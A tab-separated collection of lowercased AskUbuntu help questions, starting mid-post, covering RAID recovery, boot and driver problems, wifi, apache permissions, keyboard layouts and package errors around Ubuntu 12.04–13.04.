redid all of the steps above but recorded the link boot-repair gave me . here i do n't believe that this is related but i also put my swap partition on a second hard drive . any idea how to fix this or where i went wrong while converting ubuntu to uefi ? my computer : cyberpower pc fangbook x7-200 cpu : intel ( r ) coreâ˘ i7-3630qm mobile processor 2.40 ghz motherboard : intel hm77 express chipset mainboard hdd : 128gb ocz octane sata-iii hdd2 : 750gb 7200rpm sata300 memory : 16gb ( 4gbx4 ) ddr3-1600 sodimm video : nvidia gtx 675mx video : intel ( r ) hd graphics 4000
330784	moving a subvolume to another drive	i 'm trying to move my root subvolume to another drive . i 've booted into a live disc , ran `` cp -a /mnt/sdb/ @ /mnt/sda '' , fixed my fstab , and reinstalled grub . however when i boot up i can see that both subvolumes are mounted on / and i 'm really confused .
330785	raid issues can not boot and getting superblock errors	i am getting the errors below . how do i get the raid array fixed . i 'd like to get it mounted via the live cd that im booted into as well . just so i can backup a few items . my setup boots from the raid array so i 'm dead in the water without it . root @ ubuntu : ~ # mount /dev/md1 /mnt/ mount : /dev/md1 : ca n't read superblock root @ ubuntu : /media/ubuntu # cat /proc/mdstat personalities : [ raid6 ] [ raid5 ] [ raid4 ] md1 : inactive sdf2 [ 7 ] ( s ) sda1 [ 8 ] ( s ) sdg1 [ 6 ] ( s ) sde2 [ 4 ] ( s ) sdd2 [ 11 ] ( s ) sdc2 [ 9 ] ( s ) sdb2 [ 1 ] ( s ) 10142801446 blocks super 1.2 md0 : active raid6 sdf1 [ 6 ] sdg2 [ 7 ] sde1 [ 4 ] sdb1 [ 1 ] 62490624 blocks super 1.2 level 6 , 512k chunk , algorithm 2 [ 6/4 ] [ uu__uu ] unused devices : root @ ubuntu : /media/ubuntu # mdadm -- examine -- scan array /dev/md/0 metadata=1.2 uuid=c8081091:2f4943d7:10dec27a:157f4bc1 name=ubuntu-server:0 array /dev/md/1 metadata=1.2 uuid=42cc1f4f:4e4936d6:7459207c:9d4b12e8 name=ubuntu-server:1 root @ ubuntu : /media/ubuntu # mdadm -- assemble -- scan -v mdadm : looking for devices for /dev/md/0 mdadm : no raid superblock on /dev/md/0 mdadm : no raid superblock on /dev/sdj1 mdadm : no raid superblock on /dev/sdj mdadm : can not open device /dev/sr0 : no medium found mdadm : /dev/sdh2 has wrong uuid mdadm : no raid superblock on /dev/sdh mdadm : /dev/sdf2 has wrong uuid . mdadm : /dev/sdf1 is busy - skipping mdadm : no raid superblock on /dev/sdf mdadm : /dev/sdg2 is busy - skipping mdadm : /dev/sdg1 has wrong uuid . mdadm : no raid superblock on /dev/sdg mdadm : /dev/sdd2 has wrong uuid . mdadm : no raid superblock on /dev/sdd mdadm : /dev/sdc2 has wrong uuid . mdadm : no raid superblock on /dev/sdc mdadm : /dev/sde2 has wrong uuid . mdadm : /dev/sde1 is busy - skipping mdadm : no raid superblock on /dev/sde mdadm : /dev/sdb2 has wrong uuid . mdadm : /dev/sdb1 is busy - skipping mdadm : no raid superblock on /dev/sdb mdadm : /dev/sda1 has wrong uuid . mdadm : no raid superblock on /dev/sda mdadm : no raid superblock on /dev/loop1 mdadm : no raid superblock on /dev/loop0 mdadm : /dev/md/0 is already in use . mdadm : looking for devices for /dev/md/1 mdadm : no raid superblock on /dev/md/0 mdadm : no raid superblock on /dev/sdj1 mdadm : no raid superblock on /dev/sdj mdadm : can not open device /dev/sr0 : no medium found mdadm : /dev/sdh1 has wrong uuid . mdadm : no raid superblock on /dev/sdh mdadm : /dev/sdf2 is busy - skipping mdadm : /dev/sdf1 has wrong uuid . mdadm : no raid superblock on /dev/sdf mdadm : /dev/sdg2 has wrong uuid . mdadm : /dev/sdg1 is busy - skipping mdadm : no raid superblock on /dev/sdg mdadm : /dev/sdd2 is busy - skipping mdadm : /dev/sdd1 has wrong uuid . mdadm : no raid superblock on /dev/sdd mdadm : /dev/sdc2 is busy - skipping mdadm : /dev/sdc1 has wrong uuid . mdadm : no raid superblock on /dev/sdc mdadm : /dev/sde2 is busy - skipping mdadm : /dev/sde1 has wrong uuid . mdadm : no raid superblock on /dev/sde mdadm : /dev/sdb2 is busy - skipping mdadm : /dev/sdb1 has wrong uuid . mdadm : no raid superblock on /dev/sdb mdadm : /dev/sda1 is busy - skipping mdadm : no raid superblock on /dev/sda mdadm : no raid superblock on /dev/loop1 mdadm : no raid superblock on /dev/loop0 mdadm : /dev/md/1 is already in use . disk /dev/sda : 1999.8 gb , 1999844147200 bytes 255 heads , 63 sectors/track , 243133 cylinders , total 3905945600 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000ab645 device boot start end blocks id system /dev/sda1 63 2897949284 1448974611 fd linux raid autodetect disk /dev/sdb : 1499.7 gb , 1499748892672 bytes 255 heads , 63 sectors/track , 182334 cylinders , total 2929197056 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a3189 device boot start end blocks id system /dev/sdb1 2048 31250431 15624192 fd linux raid autodetect /dev/sdb2 * 31250432 2929195007 1448972288 fd linux raid autodetect disk /dev/sde : 1499.7 gb , 1499748892672 bytes 255 heads , 63 sectors/track , 182334 cylinders , total 2929197056 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0006f679 device boot start end blocks id system /dev/sde1 2048 31250431 15624192 fd linux raid autodetect /dev/sde2 * 31250432 2929195007 1448972288 fd linux raid autodetect disk /dev/sdc : 1499.7 gb , 1499748892672 bytes 255 heads , 63 sectors/track , 182334 cylinders , total 2929197056 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000ec83c device boot start end blocks id system /dev/sdc1 2048 31250431 15624192 fd linux raid autodetect /dev/sdc2 * 31250432 2929195007 1448972288 fd linux raid autodetect disk /dev/sdd : 1499.7 gb , 1499748892672 bytes 255 heads , 63 sectors/track , 182334 cylinders , total 2929197056 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002c199 device boot start end blocks id system /dev/sdd1 2048 31250431 15624192 fd linux raid autodetect /dev/sdd2 * 31250432 2929195007 1448972288 fd linux raid autodetect disk /dev/sdg : 1999.8 gb , 1999844147200 bytes 255 heads , 63 sectors/track , 243133 cylinders , total 3905945600 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0005f94c device boot start end blocks id system /dev/sdg1 63 2897949284 1448974611 fd linux raid autodetect /dev/sdg2 2897949285 2929195709 15623212+ fd linux raid autodetect disk /dev/sdf : 1499.7 gb , 1499748892672 bytes 255 heads , 63 sectors/track , 182334 cylinders , total 2929197056 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0005da7c device boot start end blocks id system /dev/sdf1 2048 31250431 15624192 fd linux raid autodetect /dev/sdf2 * 31250432 2929195007 1448972288 fd linux raid autodetect disk /dev/sdh : 1499.7 gb , 1499748892672 bytes 255 heads , 63 sectors/track , 182334 cylinders , total 2929197056 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a2f98 device boot start end blocks id system /dev/sdh1 2048 31250431 15624192 fd linux raid autodetect /dev/sdh2 * 31250432 2929195007 1448972288 fd linux raid autodetect disk /dev/sdj : 16.0 gb , 16005464064 bytes 255 heads , 63 sectors/track , 1945 cylinders , total 31260672 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdj1 * 2 31260671 15630335 c w95 fat32 ( lba ) disk /dev/md0 : 64.0 gb , 63990398976 bytes 2 heads , 4 sectors/track , 15622656 cylinders , total 124981248 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 524288 bytes / 2097152 bytes disk identifier : 0x00000000 disk /dev/md0 does n't contain a valid partition table i was able to get it to reassemble with oot @ ubuntu : ~ # mdadm -- assemble -- force /dev/md1 /dev/sda1 /dev/sdb2 /dev/sdc2 /dev/sdd2 /dev/sde2 /dev/sdf2 /dev/sdg1 /dev/sdh2 then i ran mdadm -- add for the drives that were missing . its rebuilding now . we will see if after all is said and done if it will boot.i do have it mounted now so i can grab some data .
330787	samba error ubuntu server 12.04.2	i am attempting to install an ftp server and continue to get this error code when installing samba . /var/lib/dpkg/info/samba4.postinst : 14 : /var/lib/dpkg/info/samba4.postinst : /usr/share/samba/setoption.pl : permission denied dpkg : error processing samba4 ( -- configure ) : subprocess installed post-installation script returned error exit status 126 errors were encountered while processing : samba4 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
330789	unity gone fglrx radeon hd 7790	i just installed the proprietary driver for the radeon hd 7790 oc following this guide , using the 3rd step ( building .deb from the amd binary ) because the additional drivers dialog does n't suggest any drivers for me ( i think the 7790 seems to use a different driver , since it also got its own category/series on the amd site ( desktop graphics - > radeon hd - > radeon hd 7790 pcie ) . the installation went without errors . anyway after i rebooted , the unity environment is missing , i can still open windows through keybindings but that 's it . all the fixes for a missing unity ( like resetting through compiz ... ) did n't work . fglrxinfo output : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 155 ( atifglextension ) minor opcode of failed request : 66 ( ) serial number of failed request : 13 current serial number in output stream : 13 this is my xorg.conf as generated by aticonfig -- initial : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection this is on ubuntu raring btw .
330796	issues with download speeds in flareget	i have been using flareget for quite a few months and i 'm normally very pleased with it . however , lately , when i try to download big files flareget starts off strong but then the download speed dwindles down and the download goes from about 20 mins to download to say over an hour to download and it just hangs there . i went to the support section of flareget.com and woefully there is hardly anything there so i decided to try my luck here . any thoughts or suggestions ? btw , i am running xubuntu 12.04 64-bit .
330797	enabling 3d acceleration vmware 9 ubuntu 13.04	i 've run the intel-linux-graphics-installer updated my drivers . i 've installed dri and enabled s3ts texture compression . ( solved problem on ubuntu 12.04 machines ) i 've looked for fixes on multiple posts . i wish i understood exactly what was going on and i 'd fix it , but i do n't know what else to do to enable 3d acceleration . i do have 640x480 and it does run . vmware 9.0.2 build-1031769 ubuntu 13.04 intel® core™2 duo cpu t7800 @ 2.60ghz × 2 intel® 965gm x86/mmx/sse2
330798	dual boot win7/ubuntu - grub menu flashes ; can not select	i have windows 7 and ubuntu 12.04 lts on two separate partitions on my desktop . i used to be able to get the grub menu at startup when i had an older ubuntu version ( probably 10.x ) but , after upgrading to 12.04 lts , the menu just flashes for a fraction of a second , giving me no chance to make a selection . i have run boot-repair , tried holding down the shift key , and a number of other solutions described on this forum . nothing seems to work . here is the log from my boot-repair session : http : //paste.ubuntu.com/5968366 . i really hope that some ubuntu expert can figure out what 's wrong . really appreciate the help/ thanks ... - ajoy
330799	ca n't unzip .zip files in xubuntu 12.04 64-bit	i downloaded some .zip files and tried three different programs to open them and these are the results that i got : squeeze : command exited with status 2304 archive manager : can not open file as archive xarchiver : archive format is not recognized so , how am i supposed to open .zip files ?
330802	how can i make my laptop a server for the intranet ?	i am using ubuntu 12.10 and i have to organize an intranet competition for which i want my laptop to act as sever so that others can see the questions and submit their answers directly on to my server . i have already installed lamp and separately installed mysql , apache , php5 etc and by using a single command apt-get install lamp-server^ but i do n't know how to make an intranet server . please someone help . thanks .
330803	ubuntu 32 bit or 64 bit on windows virtual pc on 64 bit windows 8 ?	i 'd like to install ubuntu 12.04 on windows virtual pc on 64 bit windows 8 . my laptop has corei7 processor , so i know that it can support 64 bit ubuntu . but i 'm not sure what would be the best choice , 32 bit or 64 bit ? can ubuntu 32 bit run on 64 windows 8 ?
330804	synapse still does not show files or folders	i have a problem that been reported before but the solution on that page has not helped me at all . basically , synapse ca n't find any* files or folders other than `` home '' and i 've never been able to figure out why . this means i am limited to using it to open apps . when i want to find a file or folder , i still have to navigate to get to what i 'm looking for . and i 've finally had enough ! i use ubuntu 12.04 lts on three machines ( a laptop , a desktop , and a vm ) with cinnamon ( edit : unity too ) , and synapse does n't find files or folders other than `` home '' on any of them . this has been driving me crazy for so long , and i keep coming across this answer every time i try to solve it , but it just does n't work . footnote : correction - synapse can find some files ( but very few ) , and no folders other than home . update : seriously , people . nothing ? nada ? not even a wild guess ? if it does n't work on multiple machines for me i ca n't imagine no one else has had this issue ! i was thinking maybe spideroak or dropbox was interfering , but i disabled them and ran the zeitgeist commands in the linked page , and still nothing ! gaaa ! i feel like i 'm living in the stone age without this !
330812	motherboard , sound and cd drivers not working after initial boot	i have booted up my new build yesterday with ubunutu 12.04 and am having a few issues ! i am new to ubuntu so some advise would be appreciated . anyway , i managed to get everything up and running except for my soundcard , cd/dvd driver and motherboard wont accept the driver downloads . is there a way around this ? i have a rsi h87 g43 socket 1150 atx motherboard creative soundblaster express x-fi titanium fatal1ty champion pro series any help would be much appreciated ! this is my first home build pc and the fact it 's up and running is a god send ! now i have ubuntu too , i ca n't ask for much of a better week ! ! just need those drivers ... .
330819	uninstall problem in wine program	i have installed adobe illustrator 8 in my wine . though it did n't install properly and now i'n ca n't remove/use it by using wine uninstaller as well . when i start uninstalling the adobe illustrator it 's start uninstalling but after few seconds my pc does n't respond . it 's hang.i 'm using ubuntu 12.04lts , wine 1.4.1 from ubuntu software center and wine tricks . also i have installed adobe illustrator from cd.moreover , i have also installed adobe photoshop and it 's working well . so , please tell me the solution . how can i remove adobe illustrator from wine ?
330821	i can not connect to wireless network ubuntu 12.04	below is my wireless card information . command : sudo lshw -c network output : *-network unclaimed description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f0500000-f0503fff below is my kernel version . linux chinthaka-pc 3.5.0-37-generic # 58~precise1-ubuntu smp wed jul 10 17:51:56 utc 2013 i686 i686 i386 gnu/linux if i install the broadcom driver using the additional drivers window i can see the wireless networks and i can not connect to them . i have followed many threads in ubuntu forums to get this work and none of them worked for me as of now , but when i execute the following commands , i can connect to the wireless network , but when i restart my computer the wireless is no longer there . i have to install the broadcom driver from scratch and execute these commands again . sudo modprobe -r wl sudo apt-get install linux-firmware-nonfree sudo apt-get remove -- purge bcmwl-kernel-source sudo modprobe b43 i have following entries in the /etc/modprobe.d/blacklist.conf file . blacklist bcma blacklist b43 blacklist b43legacy blacklist bcma blacklist ndiswrapper blacklist brcm80211 please can someone help me to overcome this problem ?
330822	argument in phablet-flash for nexus73g	i trying install ubuntu-touch on nexus 7 3g , using touch install . but on the step 4 , i received an error : ~ $ sudo phablet-flash -d grouper -b phablet-flash : error : argument : invalid choice : 'grouper ' ( choose from 'cdimage-touch ' , 'cdimage-legacy ' , 'ubuntu-system ' , 'community ' )
330827	how do i enable wifi on my acer aspire 5710z ?	i have ubuntu 12.4lts i find that the internet works well when hard wired , but not through my wifi . i have tried additional hardware and update manager and everything up to date . the f3 button does n't work , and none of my laptops hard keys above the keyboard work ( including wifi , obviously , amoung , mail , bluetooth and saturn ) i found a forum where i enabled wifi through a terminal session but it disconnected me from the hard wired connection , and for the first time the wifi signal came up . it showed it was searching ( flashing up to down ) and searching for approx 30 seconds then it disappeared and turned the hard wired internet back on . so , a glimmer of hope . to me it feels like ubuntu is turning on wifi , but the computer does n't have it running . help please ! p.s i ca n't find anywhere in the bios where i can play with networking settings . someone will have to walk me through that if you think that 's the problem .
330829	how to know the usage of the command before i download through command	i would like to know what 's the purpose or usage before i use `` apt-get install '' to install it .
330831	ubuntu wo n't shutdown	a bit of background first . i use my ubuntu computer as a media center and backup server , running ubuntu 12.04 . it 's scheduled to shutdown at 1am everyday . my problem is that the computer does not shutdown . it attempts to as scheduled sudo shutdown -h now , but then the computer stays on after halting . it also does this when i type it into command line or use the gui . the last thing it says is will now halt [ 945.791650 ] power down the screen stays on and the computer does n't stop , i have to use reset button or hold power button . i have already appended acpi=force to the grub config with no avail . thanks for any help..
330832	ubuntu 12.04 pxe boot fail with message `` ip-config : no response after *** secs - give up ''	i followed the disklessubuntuhowto and set up my pxe boot service . when configure the dhcp server in /etc/dhcp/dhcpd.conf , i tried to use static ip address as follows , in which `` 00:22:15 : f8 : d9:1a '' is the mac address of the first network card in sms04 ( it has two ) . allow booting ; allow bootp ; subnet 192.168.0.0 netmask 255.255.255.0 { range 192.168.0.21 192.168.0.30 ; option broadcast-address 192.168.0.255 ; option routers 192.168.0.50 ; option domain-name-servers 192.168.0.50 ; filename `` /pxelinux.0 '' ; } host sms04 { hardware ethernet 00:22:15 : f8 : d9:1a ; fixed-address 192.168.0.25 ; } when i boot sms04 using the first network card , it can successfully get the ip 192.168.0.25 ( static ip ) and then load vmlinuz and initrd . and then it failed with message ip-config : no response after * secs - give up now , i try to pull out the cable in my first network card and plug in the second , after a while , it successfully boot up with dynamic ip address 192.168.0.21 ! however , the dynamic ip address is unwanted . i try every method to boot from static ip , by failed . i will appreciate any reply .
330835	no native mode forcing panel scaling	i have dual os in my computer , windows 7 and ubuntu 12.10 . until recently , both os were working fine , but recently , when i get the grub menu and choose ubuntu , i get the following error message 12.303490 0xd591 : i2c wr fail : -6 12.486001 no native mode , forcing panel scaling i probably think some virus on windows might have affected the ubuntu partition anyway , please kindly help me to get back my ubuntu .
330836	how to return to the shell/terminal ?	sometimes after i accidentally typing something in the terminal , e.g . after invoking a `` tee '' command i am unable to quit from that program to get back to the terminal . i usually try typing : q , quit , ctrl-break , but nothing helps . so i close the terminal and open a new instance . is there a standard way to quit from the executing command ?
330850	regarding ubuntu installation on end user machines	if someone is working in computer maintenance industry and working on customer call bases then can he install ubuntu on end use machine ? as most of the end users are using pirated windows software , can we provide them with a legal copy of ubuntu at no cost , and charge end user for technical support . please consider legal issues also when answering this question .
330853	if i 'm building from source , why does it require more space than installing via apt-get ?	i was trying to install the program by compiling and then installing it . i choose pinta . it requires these dependencies : mono mono-xbuild automake autoconf libmono-cairo2.0-cil gtk-sharp2 and it requires need to get 20.6mib/26.2mib of archives and 66.4 mb of additional disk space** , but when i used apt-get install pinta , it just requires 20.3mib of additional disk space and 0/6616 kb of archives . can you please tell me , if i 'm building by source , why it requires more space comparatively to the apt-get method , and how to optimise the amount archives , that i 've installed while installing the program ( like apt-get program ) .
330860	ripping dvds with menu	i used this answer and have ripped a dvd to back it up using dvd : :rip . although it does n't seem to actually rip the menu , it does rip everything as a seperate file , which is what i would expect and is obviously fine . however , it only seems to ripping in to .vob format ( i have set it to go to .avi ) . also , it is ripping in to files that are 22 minutes long ( this does not relate to chapters on the dvd at all ) . i am quite sure i have followed the manual , thought i do n't know how up to date it is . if there are any very easy tools to `` glue '' together the files then that would also be good .
330862	how do i find out if my system is using mir ?	i 've just installed mir and i 'm wondering if i 'm actually running it or if it fell back to x . how can i tell if mir is running ?
330865	laptop boots straight up to windows 8 without asking me to start ubuntu or anything using a live usb stick	i 've turned off secure boot and fast boot but my laptop boots straight up to windows . i 'm pretty sure the usb stick works - my laptop just does n't recognizes it . help ? windows 8 64 bit .
330866	is ubuntu using my discreet gpu ?	how can i be sure that ubuntu is using my discreet gpu ? here are my lshw results if you want to check out my specs . in short , i have a laptop with an intel i5 processor , which of course has its own integrated graphics chip . along with that , i have a 2gb amd radeon 7730m discreet gpu . animations feels slow and sluggish on ubuntu 13.04 compared to windows 8 ( which i have on another partition ) . any help would be much appreciated . thanks ! lshw results ( it was a bit too long to post as a code block here. )
330871	permission forbidden on localhost with apache2	i tried to add another folder to apache and i get the following error when trying to acces testing/index.html . the idea is that i would like to have for every customer a folder like /home/neagoe/work/interwebs/projects/ [ project name ] /customerprojects/website/dist . forbidden you do n't have permission to access /index.html on this server . apache/2.2.22 ( ubuntu ) server at testing port 80 here are the steps that i followed : step1 : sudo chmod a+x /home/neagoe/work/interwebs/projects/testing/customerprojects/website/dist step2 : sudo chown -r www-data : www-data /home/neagoe/work/interwebs/projects/testing/customerprojects/website/dist sudo chmod -r 775 /home/neagoe/work/interwebs/projects/testing/customerprojects/website/dist step3 : sudo adduser $ user www-data step4 : sudo a2enmod userdir step5 : sudo cp /etc/apache/sites-available/default /etc/apache/sites-available/testing i edited the file /etc/apache/sites-available/testing so it looks like this : < virtualhost *:80 > serveradmin webmaster @ localhost servername testing documentroot /home/neagoe/work/interwebs/projects/testing/customerprojects/website/dist < directory / > options followsymlinks allowoverride none < /directory > < directory /home/neagoe/work/interwebs/projects/testing/customerprojects/website/dist/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > step6 : i edited hosts ( `` /etc/hosts '' ) so it looks like this : 127.0.0.1 localhost 127.0.0.1 testing # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters step7 : sudo a2ensite testing sudo service apache2 restart i searched for about 2 hours on the internet but i ca n't figure out what went wrong . all the pages that i found following the same steps as described above . i know there are similar questions here on askubuntu , but the answer is to change permision to the directory which i did on step2 . i am sorry if this is really a duplicate but i could't find the right answer . thank you !
330874	how to install pyv8 in ubuntu 13.04 ?	i want to install pyv8 in ubuntu 13.04 . however pip install -v pyv8 takes super long to build and finally fails . how can i install pyv8 on a ubuntu 13.04 machine ? here is the error log installationerror : command /home/x/pyv8/bin/python -c `` import setuptools ; __file__='/home/x/pyv8/build/pyv8/setup.py ' ; exec ( compile ( open ( __file__ ) .read ( ) .replace ( '\r\n ' , '\n ' ) , __file__ , 'exec ' ) ) '' install -- record /tmp/pip-63ai25-record/install-record.txt -- single-version-externally-managed -- install-headers /home/x/pyv8/include/site/python2.7 failed with error code 1 in /home/x/pyv8/build/pyv8
330882	application launcher is missing	i have 13.04 installed from a dvd that i got on ebay but the application launcher is missing . i 've tried ccsm but it wo n't work !
330884	suggestion needed for linux flavour .	i 'm completely new to linux and ubuntu . last month i took my first dell laptop which came pre-installed with ubuntu 11.10 . realizing that i 'm completely new to ubuntu , i asked the shop owner to install windows . he installed windows 7 ultimate 64 bit ( pirated but i still did n't have the knowledge of intellectual rights ) when i bought the laptop . from the past one month i have tried windows 8 pro and other versions of windows 7 ( all pirated ) . from a few days i have realized that what i am doing is just stealing someone 's hard work . my conscience is telling me to stop using pirated windows and get a legal one . but getting a legal windows 8 pro ( around 10k indian rs ) is not possible for me because i am still a student with no income and asking my parents for it is also not possible because 10 k indian rs is way too expensive . in india i have n't seen a single legal windows running machine ( except for oem ) . piracy is at the highest rate in india .so on a personal front i have decided to stop using windows and switch to linux . i need your sincere suggestions - my laptop configuration : core i3 , maximum speed 2.20 ghz , 4 gb ddr3 ram intel 3000 integrated graphics . i use my laptop for playing a few games , using cad ( computer aided engineering drawing ) software , videos , music and internet and ms office . so please suggest which version of ubuntu or linux mint will be good for my laptop configuration and my needs ( please remember i have zero background of linux ) . please also mention whether 32 or 64 bit version will be useful.. i have heard of wine.please give me a insight on the same . thanks in advance .
330885	why are n't my modifications to xkb working ?	short version currently , altgr+- produces 짜. i wish for it to produce an en-dash . in /usr/share/x11/xkb/symbols/us , i replaced all occurances of `` yen '' with `` endash '' and restarted , but this made no difference . for the record : $ setxkbmap -query rules : evdev model : pc104 layout : us variant : altgr-intl options : lv3 : ralt_switch_multikey , numpad : pc longer version i intially started by looking in /usr/share/x11/xkb/symbols/us , which contains a section marked xkb_symbols `` altgr-intl '' { . this section contains include `` us ( intl ) '' and include `` level3 ( ralt_switch ) '' , and no mention of ae11 ( which is the keycode for - ) . the section marked xkb_symbols `` intl '' { contains key < ae11 > { [ minus , underscore , yen , dead_belowdot ] } ; , and so i modified the yen here in the altgr position to endash . i restarted and this made no difference , so i did the brute force method as above ( then restarted ) . more troubleshooting if i set setxkbmap -layout us -variant mac , altgr+- produces an en-dash as expected ( and as defined in the xkb_symbols `` mac '' { section ) . i also tried swapping q and w in the xkb_symbols `` basic '' { and xkb_symbols `` intl '' { sections , but this change did not do anything after restarting . i also tried setxkbmap -layout us to select the basic layout , but this also had no effect .
330888	unable to install ubuntu 13.04 through usb	i have been trying so hard to get ubuntu to install but it wo n't . when i come to the screen where there is an option to install alongside windows , i press restart to continue . after that the pc just boots into windows again . i used a usb drive for this , and it works fine if i choose 'try ubuntu ' . i just cant get it to install onto my pc . after booting into windows theres a prompt to choose a password and select an installation size . when i go ahead with it , its starts downloading ubuntu-13.04-desktop-amd64.iso , even though i mounted the ubuntu-13.04-desktop-i386.iso onto my usb using universal usb installer . i really want to install ubuntu please help me out
330897	installing ubuntu touch on samsung galaxy tab 2 p3100	i need some one guidance to install ubuntu touch on my samsung galaxy tab 2 p3100 and i also wan na know what all app 's supports it like whats 's app , wechat , and wordpress ect .
330901	i ca n't execute file i am supposed to ( spss 21 )	i have just installed linux version of ibm statistical package spss 21 and according to instructions in order to run spss i just need to run stats file in the /bin directory . everything is ordered , that is stats file is in /bin catalogue and everything is fine , but i do n't know how to run it from the terminal . i will be very grateful dor some help .
330905	how to delete all .svn hiden files from my project to do an update in svn repository	hi , i have a problem using svn repository . when i try to update my project in svn i 'm getting the following error : oomsys @ oomsysmob-6 : ~/brundelre3 $ svn st svn : warning : ' . ' is not a working copy oomsys @ oomsysmob-6 : ~/brundelre3 $ svn up skipped ' . ' i tried the things which explained about this error previously from the following links : removing .svn files from all directories http : //bookmarks.honewatson.com/2008/06/06/find-and-remove-hidden-folders-svn-ubuntu-linux-command-line/ http : //www.ubun2.com/question/348/how_remove_all_svn_folders_recursively but nothing solves my problem . i want to remove all the hidden files from my project . thanks nirmala sudhir
330908	how can i install cloudera manager on my raring 64-bit machine ?	a n00b here , i was hoping to install cloudera manager on my ubuntu 13.04 machine but it seems only lucid and precise are supported in their repository for ubuntu distros , how will i be able to do this as easily as possible , please . or are there any alternative to apache hadoop+pig i can use that is open-source/powerful/easy-to-use than these ?
330910	lost a partition when upgraded from win 7 to ubuntu 13.04	i just installed ubuntu 13.04 on my desktop.while installing i selected an option `` replace windows 7 with ubuntu `` thinking it remove all the files of win 7 in c drive but it deleted all the files and all the partitions.i just had 2 partitions c and d. on the c drive win 7 was loaded and i had lots of important data on the d drive.it was a 500gb hard disk . it was split into 60gb in c and rest 420gb in d. these data are very valuable to me . i am currently stuck here.someone please help me to get the data back . any suggestion and help is really truly appreciated .
330911	hand of thief malware ?	anyone know anything about the hand of thief malware that has been announced for sale on an apparent underground cyber crime forum ? it is said that is has been tested to work on ubuntu ! should i be worried and i 'm assuming canonical is taking steps to stop this malware ?
330913	why debug packages do n't include sources ?	i was expecting that after installing the package libgtk-3-0-dbg i would get ddd to show the source code when stepping into gtk+ , however i had to download the source package myself ( from here ) and move it to the proper /build directory : (
330916	13.04 the software center stopped working after update : an unhandled error occured	i 've done a clean installation of ubuntu 13.04 2 weeks ago and i ca n't say the usual user experience that i knew for ubuntu is not there . i just did an update and restarted my machine as asked then , i realized i ca n't install anything any more . the error i get is : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/aptdaemon/worker.py '' , line 1185 , in _simulate trans.high_trust_packages ) = self.__simulate ( trans ) file `` /usr/lib/python3/dist-packages/aptdaemon/worker.py '' , line 1304 , in __simulate unauthenticated = self._get_unauthenticated ( ) file `` /usr/lib/python3/dist-packages/aptdaemon/worker.py '' , line 451 , in _get_unauthenticated for origin in pkg.candidate.origins : file `` /usr/lib/python3/dist-packages/apt/package.py '' , line 479 , in origins origins.append ( origin ( self.package , packagefile ) ) file `` /usr/lib/python3/dist-packages/apt/package.py '' , line 145 , in __init__ self.archive = packagefile.archive unicodedecodeerror : 'utf-8 ' codec ca n't decode byte 0xb3 in position 3 : invalid start byte can anyone shed some lights on what 's happening , and what are my options ? thanks in advance . edit sudo apt-get install -- reinstall software-center produces the following : reading package lists ... error ! e : unable to parse package file /var/lib/apt/lists/gh.archive.ubuntu.com_ubuntu_dists_raring_multiverse_binary-i386_packages ( 1 ) e : the package lists or status file could not be parsed or opened .
